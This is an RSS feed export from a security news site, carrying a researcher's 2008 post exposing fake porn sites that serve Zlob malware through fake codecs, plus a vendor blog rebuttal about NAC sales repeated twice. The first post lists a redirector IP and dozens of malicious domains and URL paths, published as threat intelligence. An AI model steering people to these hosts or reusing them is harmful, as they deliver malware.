<?xml version="1.0" encoding="utf-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title><![CDATA[[SecurityRatty] tag: dom-x]]></title>
    <link>http://securityratty.com/tag/dom-x</link>
    <description></description>
    <pubDate>Sun, 30 Dec 2007 18:15:23 +0000</pubDate>
    <generator>iRatty Engine</generator>
    <docs>http://blogs.law.harvard.edu/tech/rss</docs>
    <item>
      <title><![CDATA[Fake Porn Sites Serving Malware]]></title>
      <link>http://securityratty.com/article/5dacf1e5b6c84c1bed4515dca8fc1199</link>
      <guid>http://securityratty.com/article/5dacf1e5b6c84c1bed4515dca8fc1199</guid>
      <description><![CDATA[Ah, that RBN with its centralization mentality for the sake of ease of management and 99.999% uptime. In this very latest example of using malicious doorways redirecting to fake porn sites, consisting...]]></description>
      <content:encoded><![CDATA[<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_wICHhTiQmrA/SGJTBaqN1yI/AAAAAAAAB1k/b9O7PupnB8E/s1600-h/porn_codecs.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp2.blogger.com/_wICHhTiQmrA/SGJTBaqN1yI/AAAAAAAAB1k/b9O7PupnB8E/s200/porn_codecs.JPG" alt="" id="BLOGGER_PHOTO_ID_5215822602249819938" border="0" /></a>Ah, that RBN with its centralization mentality for the sake of ease of management and 99.999% uptime. In this very latest example of using malicious doorways redirecting to fake porn sites, consisting of over twenty different domains serving the usual Zlob malware variants, we have a decent abuse of a template for a porn site.<br /><br />The easy of management of such domain farms and the availability of templates for high trafficked topic segments such as celebrities and pornography, continue contributing to the increasing number of Zlob variants served through fake codecs. Moreover, once set up, the malicious infrastructure starts attracting now just generic search traffic, but also traffic coming from affiliates with whom revenue is shared on the basis of the number of people that downloaded the codec.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_wICHhTiQmrA/SGJsP6kwvTI/AAAAAAAAB1s/b0lRo5htJtE/s1600-h/fake_porn_sites_ATRIVO.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_wICHhTiQmrA/SGJsP6kwvTI/AAAAAAAAB1s/b0lRo5htJtE/s200/fake_porn_sites_ATRIVO.JPG" alt="" id="BLOGGER_PHOTO_ID_5215850339125738802" border="0" /></a>In this campaign, the malicious doorway that expands the entire ecosystem is located at <span style="font-weight: bold;">search-</span><span style="font-weight: bold;">top.com/in.cgi?5&amp;parameter=drs</span> (66.96.85.113). A redirector that appears to <a href="http://www.lavasoftsupport.com/index.php?showtopic=2662">have been operating since 2006</a>, according to this forum posting.<br /><br />What follows on-the-fly, are all the fake porn sites whose legitimately looking videos attempt to download a Zlob malware variant from a single location - <span style="font-weight: bold;">vipcodec.net</span>. Here are all the fake porn sites, and the associated campaigns in this redirection :<br /><br /><span style="font-weight: bold;">watchnenjoy .com</span>/index.php?id=1287&amp;style=white<br /><span style="font-weight: bold;">craziestclips .com</span>/index.php?id=1287&amp;q=<br /><span style="font-weight: bold;">immensevids .com</span><br /><span style="font-weight: bold;">planetfreepornmovies .com</span>/?t=1&amp;id=1219<br /><span style="font-weight: bold;">poweradult .net</span>/edmund/16551689/1/&amp;id=1219<br /><span style="font-weight: bold;">scan-porn .net</span>/rosalyn/1742941675/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/emiline/108846601/1/&amp;id=1219<br /><span style="font-weight: bold;">service-porn .com</span>/inde/964842117/1/&amp;id=1219<br /><span style="font-weight: bold;">pleasure-porn .com</span>/elnora/648311952/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-the .net</span>/verge/1734135233/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-pleasure .net</span>/dal/1663381205/1/&amp;id=1219<br /><span style="font-weight: bold;">scan-porn .ne</span><span style="font-weight: bold;">t</span>/gretchen/515268975/1/&amp;id=1219<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_wICHhTiQmrA/SGJ2DJRJgoI/AAAAAAAAB10/0pUS4GVInf4/s1600-h/porn_domainfarm_codecs_visualized.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp1.blogger.com/_wICHhTiQmrA/SGJ2DJRJgoI/AAAAAAAAB10/0pUS4GVInf4/s200/porn_domainfarm_codecs_visualized.JPG" alt="" id="BLOGGER_PHOTO_ID_5215861114847986306" border="0" /></a><span style="font-weight: bold;">abc-adult .com</span>/lillah/1467790484/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/jenne/434165228/1/&amp;id=1219<br /><span style="font-weight: bold;">look-adult .net</span>/ette/681831796/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/mime/65729013/1/&amp;id=1219<br /><span style="font-weight: bold;">name-adult .net</span>/alfe/550398461/1/&amp;id=1219<br /><span style="font-weight: bold;">group-ad</span><span style="font-weight: bold;">ult .net</span>/demerias/867452637/1/&amp;id=1219<br /><span style="font-weight: bold;">useporn .net</span>/rhode/167691118/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-look .net</span>/hephsibah/1254235416/1/&amp;id=1219<br /><span style="font-weight: bold;">scan-porn .net</span>/hence/1684651134/1/&amp;id=1219<br /><span style="font-weight: bold;">abc-adult .com</span>/kendra/371598555/1/&amp;id=1219<br /><span style="font-weight: bold;">name-adult .net</span>/link/1334727639/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-the .net</span>/flo/84660854/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-popular .com</span>/assene/875893411/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/charlotta/972714195/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-comp .com</span>/orlando/761508522/1/&amp;id=1219<br /><span style="font-weight: bold;">useporn .net</span>/jemima/1405735776/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/obadiah/263904242/1/&amp;id=1219<br /><span style="font-weight: bold;">group-adult .net</span>/douglas/1110779475/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-look .net</span>/lydde/1844064103/1/&amp;id=1219<br /><span style="font-weight: bold;">pleasure-porn .com</span>/marcia/1627490290/1/&amp;id=1219<br /><span style="font-weight: bold;">service-porn .com</span>/cono/295680123/1/&amp;id=1219<br /><span style="font-weight: bold;">group-adult .net</span>/wes/1733468207/1/&amp;id=1219<br /><span style="font-weight: bold;">abc-adult .com</span>/wib/648341815/1/&amp;id=1219<br /><span style="font-weight: bold;">scan-porn .net</span>/greg/2064937302/1/&amp;id=1219<br /><span style="font-weight: bold;">contact-adult .net</span>/maris/33184936/1/&amp;id=1219<br /><span style="font-weight: bold;">look-adult .net</span>/regina/1273816838/1/&amp;id=1219<br /><span style="font-weight: bold;">abc-adult .com</span>/gwendolyn/869744046/1/&amp;id=1219<br /><span style="font-weight: bold;">service-porn .com</span>/carthaette/1021629112/1/&amp;id=1219<br /><span style="font-weight: bold;">scan-porn .net</span>/ninell/1522355420/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-pleasure .net</span>/waldo/755290223/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-the .net</span>/green/669090607/1/&amp;id=1219<br /><span style="font-weight: bold;">try-adult .com</span>/lula/447057398/1/&amp;id=1219<br /><span style="font-weight: bold;">visit-adult .net</span>/jay/1021153563/1/&amp;id=1219<br /><span style="font-weight: bold;">contact-adult .net</span>/rosa/849017739/1/&amp;id=1219<br /><span style="font-weight: bold;">name-adult .net</span>/hannah/2111126283/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/robin/2114086747/1/&amp;id=1219<br /><span style="font-weight: bold;">scan-porn .net</span>/geraldine/921262381/1/&amp;id=1219<br /><span style="font-weight: bold;">contact-adult .net</span>/christine/1821111087/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-popular .com</span>/frederica/364993202/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/kerste/735582753/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-the .net</span>/vine/715820953/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-the .net</span>/newt/1835463160/1/&amp;id=1219<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp1.blogger.com/_wICHhTiQmrA/SGJ6ha5cUzI/AAAAAAAAB18/wtJ3aPXos_Q/s1600-h/zlob_codec_setup.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp1.blogger.com/_wICHhTiQmrA/SGJ6ha5cUzI/AAAAAAAAB18/wtJ3aPXos_Q/s200/zlob_codec_setup.png" alt="" id="BLOGGER_PHOTO_ID_5215866033022980914" border="0" /></a><span style="font-weight: bold;">try-adult .com</span>/max/602914725/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-pleasure .net</span>/cille/1420660046/1/&amp;id=1219<br /><span style="font-weight: bold;">poweradult .net</span>/phililpa/178057959/1/&amp;id=1219<br /><span style="font-weight: bold;">name-adult .net</span>/lise/1379126759/1/&amp;id=1219<br /><span style="font-weight: bold;">pleasure-porn .com</span>/marianne/1083617952/1/&amp;id=1219<br /><span style="font-weight: bold;">poweradult .net</span>/emile/1173468576/1/&amp;id=1219<br /><span style="font-weight: bold;">useporn .net</span>/patse/155685496/1/&amp;id=1219<br /><span style="font-weight: bold;">helpporn .net</span>/verna/625840253/1/&amp;id=1219<br /><span style="font-weight: bold;">name-adult .net</span>/aubrey/190928373/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .</span><span style="font-weight: bold;">net</span>/alphinias/1345158043/1/&amp;id=1219<br /><span style="font-weight: bold;">useporn .net</span>/rosa/223743611/1/&amp;id=1219<br /><span style="font-weight: bold;">pleasure-porn .com</span>/nerva/1509620489/1/&amp;id=1219<br /><span style="font-weight: bold;">helpporn .net</span>/leet/1619667733/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/roberta/887345003/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-pleasure .net</span>/tore/1032556395/1/&amp;id=1219<br /><span style="font-weight: bold;">useporn .net</span>/bo/1963737386/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-look .net</span>/karon/136085893/1/&amp;id=1219<br /><span style="font-weight: bold;">poweradult .net</span>/tense/1523522750/1/&amp;id=1219<br /><span style="font-weight: bold;">poweradult .net</span>/hopp/1955964399/1/&amp;id=1219<br /><span style="font-weight: bold;">scan-porn .net</span>/vanne/350822489/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-comp .com</span>/deb/1451360694/1/&amp;id=1219<br /><span style="font-weight: bold;">about-adult .net</span>/moll/1511640690/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-popular .com</span>/obediah/562846948/1/&amp;id=1219<br /><span style="font-weight: bold;">helpporn .net</span>/tamarra/776122096/1/&amp;id=1219<br /><span style="font-weight: bold;">pleasure-porn .com</span>/aristotle/1046422029/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-comp .com</span>/titia/158157566/1/&amp;id=1219<br /><span style="font-weight: bold;">group-adult .net</span>/gay/1297835054/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-look .net</span>/katherine/2136357734/1/&amp;id=1219<br /><span style="font-weight: bold;">helpporn .net</span>/azubah/1197502147/1/&amp;id=1219<br /><span style="font-weight: bold;">porn-comp .com</span>/claes/770105101/1/&amp;id=1219<br /><br />Associated fake porn sites :<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp3.blogger.com/_wICHhTiQmrA/SGJ7UYzaZJI/AAAAAAAAB2E/cy7Pijctw-8/s1600-h/fake_porn_sites_ATRIVO1.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp3.blogger.com/_wICHhTiQmrA/SGJ7UYzaZJI/AAAAAAAAB2E/cy7Pijctw-8/s200/fake_porn_sites_ATRIVO1.JPG" alt="" id="BLOGGER_PHOTO_ID_5215866908634145938" border="0" /></a><span style="font-weight: bold;">pornbrake .com</span> <span style="font-weight: bold;"><br />sexnitro .net</span> <span style="font-weight: bold;"><br />brakesex .net</span> <span style="font-weight: bold;"><br />pornnitro .net</span> <span style="font-weight: bold;"><br />adultbookings .com</span> <span style="font-weight: bold;"><br />qazsex .com</span><br /><span style="font-weight: bold;">lightporn .net</span> <span style="font-weight: bold;"><br />delfiporn .net</span> <span style="font-weight: bold;"><br />pornqaz .com</span> <span style="font-weight: bold;"><br />megazporn .com</span> <span style="font-weight: bold;"><br />uinsex .com</span><br /><span style="font-weight: bold;">xerosex .com</span> <span style="font-weight: bold;"><br />serviceporn .com</span> <span style="font-weight: bold;"><br />aboutadultsex .com</span> <span style="font-weight: bold;"><br />superliveporn .com</span> <span style="font-weight: bold;"><br />bestpriceporn .com</span> <span style="font-weight: bold;"><br />contactporn .net</span> <span style="font-weight: bold;"><br />relatedporn .com</span> <span style="font-weight: bold;"><br />landporno .com</span> <span style="font-weight: bold;"><br />adultsper .com</span> <span style="font-weight: bold;"><br />plus-porn .com</span> <span style="font-weight: bold;"><br />adultstarworld .com</span><br /><span style="font-weight: bold;">cutadult .com</span> <span style="font-weight: bold;"><br />moviexxxhotel .com</span> <span style="font-weight: bold;"><br />porno-go .com</span> <span style="font-weight: bold;"><br />pornxxxfilm .com</span> <span style="font-weight: bold;"><br />porn-sea .com</span> <span style="font-weight: bold;"><br />review-sex .com</span> <span style="font-weight: bold;"><br />sureadult .com</span> <span style="font-weight: bold;"><br />browseadult .com</span> <span style="font-weight: bold;"><br />network-adult .com</span> <span style="font-weight: bold;"><br />timeadult .com</span> <span style="font-weight: bold;"><br />virtual-sexy .net</span><br /><span style="font-weight: bold;">funxxxporn .com</span> <span style="font-weight: bold;"><br />loweradult .com</span> <span style="font-weight: bold;"><br />adultfilmsite .com</span> <span style="font-weight: bold;"><br />xxxallvideo .com</span> <span style="font-weight: bold;"><br />custom-sex .com</span> <span style="font-weight: bold;"><br />g</span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://bp2.blogger.com/_wICHhTiQmrA/SGJ8FOk2RhI/AAAAAAAAB2M/scnBizNZUOA/s1600-h/fake_porn_sites_ATRIVO2.JPG"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://bp2.blogger.com/_wICHhTiQmrA/SGJ8FOk2RhI/AAAAAAAAB2M/scnBizNZUOA/s200/fake_porn_sites_ATRIVO2.JPG" alt="" id="BLOGGER_PHOTO_ID_5215867747702294034" border="0" /></a><span style="font-weight: bold;">allerypictures .net</span> <span style="font-weight: bold;"><br />usaadultvideo .com</span><br /><span style="font-weight: bold;">adultmovieplus .com</span> <span style="font-weight: bold;"><br />porn-cruise .com</span> <span style="font-weight: bold;"><br />clubxxxvideo .com</span> <span style="font-weight: bold;"><br />mitadult .com</span> <span style="font-weight: bold;"><br />galleryalbum .net</span> <span style="font-weight: bold;"><br />xxxteenfilm .com</span> <span style="font-weight: bold;"><br />hardcorevideosite .com</span> <span style="font-weight: bold;"><br />helpadult .com</span> <span style="font-weight: bold;"><br />portaladult .net</span> <span style="font-weight: bold;"><br />service-sex .com</span> <span style="font-weight: bold;"><br />driveadult .com</span> <span style="font-weight: bold;"><br />access-porno .com</span> <span style="font-weight: bold;"><br />time-sex .com</span> <span style="font-weight: bold;"><br />plus-adult .com</span> <span style="font-weight: bold;"><br />worldadultvideo .com</span><br /><span style="font-weight: bold;">key-adult .com</span><br /><span style="font-weight: bold;">estatesex .com</span> <span style="font-weight: bold;"><br />superadultfriend .com</span><br /><span style="font-weight: bold;">superporncity .com</span> <span style="font-weight: bold;"><br />zero-porno .com</span> <span style="font-weight: bold;"><br />scanadult .com</span> <span style="font-weight: bold;"><br />adultsexpro .com</span> <span style="font-weight: bold;"><br />adultzoneworld .com</span> <span style="font-weight: bold;"><br />porntimeguide .com</span> <span style="font-weight: bold;"><br />usbestporn .com</span> <span style="font-weight: bold;"><br />adulttow .com</span> <span style="font-weight: bold;"><br />look-porn .com</span><br /><span style="font-weight: bold;">galleryclick .net</span><br /><span style="font-weight: bold;">micro-sex .com</span> <span style="font-weight: bold;"><br />estatesex .com</span> <span style="font-weight: bold;"><br />try-sex .com</span> <span style="font-weight: bold;"><br />0bucksforpornmovie .com</span> <span style="font-weight: bold;"><br />gays-video-xxx .com</span> <span style="font-weight: bold;"><br />hackthegrid .com</span> <span style="font-weight: bold;"><br />savetop .info</span> <span style="font-weight: bold;"><br />vidsplanet .net</span> <span style="font-weight: bold;"><br />freexxxhere .com</span> <span style="font-weight: bold;"><br />gestkoeporno .com</span><br /><span style="font-weight: bold;">tv-adult .info</span> <span style="font-weight: bold;"><br />gays-adult-video .com</span> <span style="font-weight: bold;"><br />matures-video .com</span> <span style="font-weight: bold;"><br />analcekc .com</span> <span style="font-weight: bold;"><br />tabletskard .in</span> <span style="font-weight: bold;"><br />molodiedevki .com</span> <span style="font-weight: bold;"><br />dom-porno .com</span> <span style="font-weight: bold;"><br />pornoaziatki .com</span> <span style="font-weight: bold;"><br />latinosvideo .com</span> <span style="font-weight: bold;"><br />geiporno .com</span> <span style="font-weight: bold;"><br />sweetfreeporn .com</span><br /><br />If exposing a huge domains portfolio of currently active redirectors has the potential to ruin someone's vacation, then consider someone's vacation ruined already.<br /><br /><span style="font-weight: bold;">Related posts:<br /></span><a href="http://ddanchev.blogspot.com/2008/06/underground-multitasking-in-action.html">Underground Multitasking in Action</a><br /><a href="http://ddanchev.blogspot.com/2008/06/fake-celebrity-video-sites-serving.html">Fake Celebrity Video Sites Serving Malware</a><br /><a href="http://ddanchev.blogspot.com/2008/06/blackhat-seo-redirects-to-malware-and.html">Blackhat SEO Redirects to Malware and Rogue Software</a><br /><a href="http://ddanchev.blogspot.com/2008/06/malicious-doorways-redirecting-to.html">Malicious Doorways Redirecting to Malware</a><br /><a href="http://ddanchev.blogspot.com/2008/03/portfolio-of-fake-video-codecs.html">A Portfolio of Fake Video Codecs</a><div class="feedflare">
<a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=XlaQvI"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=XlaQvI" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=cI4v2I"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=cI4v2I" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=U4oTAi"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=U4oTAi" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=LbooCi"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=LbooCi" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=MITw1I"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=MITw1I" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=nqHRRI"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=nqHRRI" border="0"></img></a> <a href="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?a=2sf0Xi"><img src="http://feeds.feedburner.com/~f/DanchoDanchevOnSecurityAndNewMedia?i=2sf0Xi" border="0"></img></a>
</div><img src="http://feeds.feedburner.com/~r/DanchoDanchevOnSecurityAndNewMedia/~4/319853315" height="1" width="1"/>]]></content:encoded>
      <pubDate>Wed, 25 Jun 2008 08:16:20 +0000</pubDate>
      <category domain="http://securityratty.com/tag/net">net</category>
      <category domain="http://securityratty.com/tag/fake porn sites">fake porn sites</category>
      <category domain="http://securityratty.com/tag/malware">malware</category>
      <category domain="http://securityratty.com/tag/about-adult">about-adult</category>
      <category domain="http://securityratty.com/tag/scan-porn">scan-porn</category>
      <category domain="http://securityratty.com/tag/zlob malware variant">zlob malware variant</category>
      <category domain="http://securityratty.com/tag/name-adult">name-adult</category>
      <category domain="http://securityratty.com/tag/useporn">useporn</category>
      <category domain="http://securityratty.com/tag/porn-the">porn-the</category>
      <source url="http://feeds.feedburner.com/~r/DanchoDanchevOnSecurityAndNewMedia/~3/319853315/fake-porn-sites-serving-malware.html">Fake Porn Sites Serving Malware</source>
    </item>
    <item>
      <title><![CDATA[Mr Bump has a problem with me being frustrated by loving customers]]></title>
      <link>http://securityratty.com/article/1f44fa47d39bc9ab7afac7c6afcf84a5</link>
      <guid>http://securityratty.com/article/1f44fa47d39bc9ab7afac7c6afcf84a5</guid>
      <description><![CDATA[So my friend Mr Bump has a problem with my post on vendor frustrations with customers. For those who don't know Mr Bump, he writes about &quot;NAC in the real world&quot;, originally about his deployment of...]]></description>
      <content:encoded><![CDATA[
<div xmlns="http://www.w3.org/1999/xhtml"><p>So my friend <a href="http://www.bumpinthewire.com/?p=194#comment-727">Mr Bump has a problem</a> with my post on vendor frustrations with customers. For those who don't know Mr Bump, he writes about &quot;NAC in the real world&quot;, originally about his deployment of Nevis Networks product. At first I thought Mr Bump was a pseudonym for Dom Wilde over at Nevis, but over time I actually like some of what Mr Bump writes and he contributes to the security blogosphere in a positive way. I just like to give him crap about his choice of NAC vendors, but it is all in good fun. Plus I actually like and respect Dom Wilde and that kind of unscrupulous behavior is not his thing.&nbsp; There is another NAC vendor who plays fast and loose like that though and I will be writing more about that this week, so stay tuned.<br /><br />Mr Bump responds to each of my three points, but before I get to that, let me clear up a few things. First of all Mr Bump says that this is his problem with 90% of all &quot;sales&quot; people. Mr Bump, you obviously have some issues with sales people. Were they mean to you when you were young? Did your Mom like the salesperson sibling better? Do you secretly dream of being a sales person? Just kidding, but seriously, I did not write my article from the point of view of a sales person. Sorry you confused me with one, though as I have said before we all sell everyday, whether we admit it or not. I was writing from the point of view of a business owner, trying to build a solid business one customer at a time. I am not concerned with short term commissions, but building out a solid customer base. This way I can sell the business for a huge profit and you can call me a slimy entrepreneur ;-).<br /><br />Also, I can complain as a customer, that is my right. Equally so it is my right to complain about customers as well. I guess I can complain about anything I want on my own blog, not sure why that should bother you. Think of it this way. We all wear different masks in different roles in our lives. Sometimes we wear the Daddy mask, sometimes the boss, sometimes the employee, etc, etc. Being one in one situation, does not preclude you from being another in another situation.<br /><br />Now, on to the show. Mr Bump doubts my sincerity about being upset when a new guy comes into a customer replacing the guy who bought the product and we have to start all over with them. He says I am kidding him. I made my sale and collected my commission and am on my way. Well Mr Bump, I suggest that if that is the kind of security vendors you deal with, find new ones! Any good business person can tell you that one unhappy customer is worth 10 happy ones. It is about building long term customers. That is how you build a business, not about being bandits who come in, rape and pillage, collect the commission and move on. I have known sales people who have sold to the same people over and over again, because they do care for more than the short term commission. I am sorry you can't believe it and you can't see how it frustrates a vendor. But sometimes we will work with a person for months or even years and build a deep relationship. As part of the game, they move on, I get it and that is the way it is. But it is very frustrating starting from square one with the new guy who may have a pre-conceived prejudice. <br /><br />Next Mr Bump finds it unbelievable that I would care if a product implementation got delayed. Again, this speaks wonders to the kind of security vendors he deals with. It is not about if my resources are committed at all. Mr Bump I can't wait to get you up and running so you can tell your friends and others about what a great product and company you deal with and we can continue building the business. Also, believe it or not I care that all of a sudden a maintenance fee comes up because the time starts running from the date of sale and the customer hasn't even used the product yet. Shelfware is a failure for a vendor. Delaying implementation is the first step to shelfware. Please Mr Bump spare me your &quot;in the trenches and grenades&quot; story. Most hard working people at security vendors or anywhere else for that matter are not sitting around playing foosball either! We all deal with emergencies and priorities. I am keenly aware of the security and network admins job pressures and have tried to build a company that actually makes your life easier. Again, I can only assume you are dealing with quite a bunch of vendors if you feel this way.<br /><br />Lastly Mr Bump almost agrees with me about using the product in unintended ways. Mr Bump I can put you in touch with people who have done this. You have to remember that unlike your NAC vendor, our stuff is built on off the shelf hardware with open, standards based OS and database, etc. People who are comfortable around a command line and Linux like to play. We don't mind, just realize how hard that makes our support obligations though and don't expect us to fix what you &quot;developed&quot; <br /><br />So I hope that clears that up. Like I said in my comment on your blog, too bad you didn't pick a better NAC solution you might have a different opinion of security vendors and maybe even sales people ;-)</p></div>
]]></content:encoded>
      <pubDate>Fri, 13 Jun 2008 21:10:08 +0000</pubDate>
      <category domain="http://securityratty.com/tag/bump">bump</category>
      <category domain="http://securityratty.com/tag/bump responds">bump responds</category>
      <category domain="http://securityratty.com/tag/sales people">sales people</category>
      <category domain="http://securityratty.com/tag/people">people</category>
      <category domain="http://securityratty.com/tag/bump doubts">bump doubts</category>
      <category domain="http://securityratty.com/tag/bump writes">bump writes</category>
      <category domain="http://securityratty.com/tag/security">security</category>
      <category domain="http://securityratty.com/tag/security vendors">security vendors</category>
      <category domain="http://securityratty.com/tag/person">person</category>
      <source url="http://www.stillsecureafteralltheseyears.com/ashimmy/2008/06/mr-bump-has-a-p.html">Mr Bump has a problem with me being frustrated by loving customers</source>
    </item>
    <item>
      <title><![CDATA[Mr Bump has a problem with me being frustrated by loving customers]]></title>
      <link>http://securityratty.com/article/4e41c81d400ce1b191d4774628571080</link>
      <guid>http://securityratty.com/article/4e41c81d400ce1b191d4774628571080</guid>
      <description><![CDATA[So my friend Mr Bump has a problem with my post on vendor frustrations with customers. For those who don't know Mr Bump, he writes about &quot;NAC in the real world&quot;, originally about his deployment of...]]></description>
      <content:encoded><![CDATA[
<div xmlns="http://www.w3.org/1999/xhtml"><p>So my friend <a href="http://www.bumpinthewire.com/?p=194#comment-727">Mr Bump has a problem</a> with my post on vendor frustrations with customers. For those who don't know Mr Bump, he writes about &quot;NAC in the real world&quot;, originally about his deployment of Nevis Networks product. At first I thought Mr Bump was a pseudonym for Dom Wilde over at Nevis, but over time I actually like some of what Mr Bump writes and he contributes to the security blogosphere in a positive way. I just like to give him crap about his choice of NAC vendors, but it is all in good fun. Plus I actually like and respect Dom Wilde and that kind of unscrupulous behavior is not his thing.&nbsp; There is another NAC vendor who plays fast and loose like that though and I will be writing more about that this week, so stay tuned.<br /><br />Mr Bump responds to each of my three points, but before I get to that, let me clear up a few things. First of all Mr Bump says that this is his problem with 90% of all &quot;sales&quot; people. Mr Bump, you obviously have some issues with sales people. Were they mean to you when you were young? Did your Mom like the salesperson sibling better? Do you secretly dream of being a sales person? Just kidding, but seriously, I did not write my article from the point of view of a sales person. Sorry you confused me with one, though as I have said before we all sell everyday, whether we admit it or not. I was writing from the point of view of a business owner, trying to build a solid business one customer at a time. I am not concerned with short term commissions, but building out a solid customer base. This way I can sell the business for a huge profit and you can call me a slimy entrepreneur ;-).<br /><br />Also, I can complain as a customer, that is my right. Equally so it is my right to complain about customers as well. I guess I can complain about anything I want on my own blog, not sure why that should bother you. Think of it this way. We all wear different masks in different roles in our lives. Sometimes we wear the Daddy mask, sometimes the boss, sometimes the employee, etc, etc. Being one in one situation, does not preclude you from being another in another situation.<br /><br />Now, on to the show. Mr Bump doubts my sincerity about being upset when a new guy comes into a customer replacing the guy who bought the product and we have to start all over with them. He says I am kidding him. I made my sale and collected my commission and am on my way. Well Mr Bump, I suggest that if that is the kind of security vendors you deal with, find new ones! Any good business person can tell you that one unhappy customer is worth 10 happy ones. It is about building long term customers. That is how you build a business, not about being bandits who come in, rape and pillage, collect the commission and move on. I have known sales people who have sold to the same people over and over again, because they do care for more than the short term commission. I am sorry you can't believe it and you can't see how it frustrates a vendor. But sometimes we will work with a person for months or even years and build a deep relationship. As part of the game, they move on, I get it and that is the way it is. But it is very frustrating starting from square one with the new guy who may have a pre-conceived prejudice. <br /><br />Next Mr Bump finds it unbelievable that I would care if a product implementation got delayed. Again, this speaks wonders to the kind of security vendors he deals with. It is not about if my resources are committed at all. Mr Bump I can't wait to get you up and running so you can tell your friends and others about what a great product and company you deal with and we can continue building the business. Also, believe it or not I care that all of a sudden a maintenance fee comes up because the time starts running from the date of sale and the customer hasn't even used the product yet. Shelfware is a failure for a vendor. Delaying implementation is the first step to shelfware. Please Mr Bump spare me your &quot;in the trenches and grenades&quot; story. Most hard working people at security vendors or anywhere else for that matter are not sitting around playing foosball either! We all deal with emergencies and priorities. I am keenly aware of the security and network admins job pressures and have tried to build a company that actually makes your life easier. Again, I can only assume you are dealing with quite a bunch of vendors if you feel this way.<br /><br />Lastly Mr Bump almost agrees with me about using the product in unintended ways. Mr Bump I can put you in touch with people who have done this. You have to remember that unlike your NAC vendor, our stuff is built on off the shelf hardware with open, standards based OS and database, etc. People who are comfortable around a command line and Linux like to play. We don't mind, just realize how hard that makes our support obligations though and don't expect us to fix what you &quot;developed&quot; <br /><br />So I hope that clears that up. Like I said in my comment on your blog, too bad you didn't pick a better NAC solution you might have a different opinion of security vendors and maybe even sales people ;-)</p></div>

<p><a href="http://feeds.feedburner.com/~a/StillsecureAfterAllTheseYears?a=yZy0VM"><img src="http://feeds.feedburner.com/~a/StillsecureAfterAllTheseYears?i=yZy0VM" border="0"></img></a></p><div class="feedflare">
